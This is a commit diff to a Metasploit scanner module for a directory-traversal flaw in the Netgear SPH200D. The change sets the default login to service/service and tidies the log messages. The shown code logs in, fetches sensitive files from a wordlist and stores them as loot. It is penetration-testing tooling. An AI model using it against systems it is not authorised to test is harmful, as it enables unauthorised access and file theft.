Change credentials to service:service

void-in · void-in · commit a7988f9e9302 · 2015-05-08T22:52:59.000+05:00
diff --git a/modules/auxiliary/scanner/http/netgear_sph200d_traversal.rb b/modules/auxiliary/scanner/http/netgear_sph200d_traversal.rb
@@ -31,11 +31,15 @@ def initialize
       [
         OptPath.new('FILELIST',  [ true, "File containing sensitive files, one per line",
           File.join(Msf::Config.data_directory, "wordlists", "sensitive_files.txt") ]),
-        OptString.new('USERNAME',[ true, 'User to login with', 'admin']),
-        OptString.new('PASSWORD',[ true, 'Password to login with', 'password'])
+        OptString.new('USERNAME',[ true, 'User to login with', 'service']),
+        OptString.new('PASSWORD',[ true, 'Password to login with', 'service'])
       ], self.class)
   end
 
+  def peer
+    "#{rhost}:#{rport}"
+  end
+
   def extract_words(wordfile)
     return [] unless wordfile && File.readable?(wordfile)
     begin
@@ -60,7 +64,7 @@ def find_files(file,user,pass)
     })
 
     if res and res.code == 200 and res.body !~ /404\ File\ Not\ Found/
-      print_good("#{rhost}:#{rport} - Request may have succeeded on file #{file}")
+      print_good("#{peer} - Request may have succeeded on file #{file}")
       report_web_vuln({
         :host     => rhost,
         :port     => rport,
@@ -74,18 +78,18 @@ def find_files(file,user,pass)
         :method   => "GET"
       })
 
-      loot = store_loot("lfi.data","text/plain",rhost, res.body,file)
-      vprint_good("#{rhost}:#{rport} - File #{file} downloaded to: #{loot}")
+      loot = store_loot("lfi.data","text/plain", rhost, res.body, file)
+      vprint_good("#{peer} - File #{file} downloaded to: #{loot}")
     elsif res and res.code
-      vprint_error("#{rhost}:#{rport} - Attempt returned HTTP error #{res.code} when trying to access #{file}")
+      vprint_error("#{peer} - Attempt returned HTTP error #{res.code} when trying to access #{file}")
     end
   end
 
   def run_host(ip)
     user = datastore['USERNAME']
     pass = datastore['PASSWORD']
 
-    vprint_status("#{rhost}:#{rport} - Trying to login with #{user} / #{pass}")
+    vprint_status("#{peer} - Trying to login with #{user} / #{pass}")
 
     # test login
     begin
@@ -100,14 +104,14 @@ def run_host(ip)
       return :abort if (res.code == 404)
 
       if [200, 301, 302].include?(res.code)
-        vprint_good("#{rhost}:#{rport} - Successful login #{user}/#{pass}")
+        vprint_good("#{peer} - Successful login #{user}/#{pass}")
       else
-        vprint_error("#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}")
+        vprint_error("#{peer} - No successful login possible with #{user}/#{pass}")
         return :abort
       end
 
     rescue ::Rex::ConnectionError
-      vprint_error("#{rhost}:#{rport} - Failed to connect to the web server")
+      vprint_error("#{peer} - Failed to connect to the web server")
       return :abort
     end
 
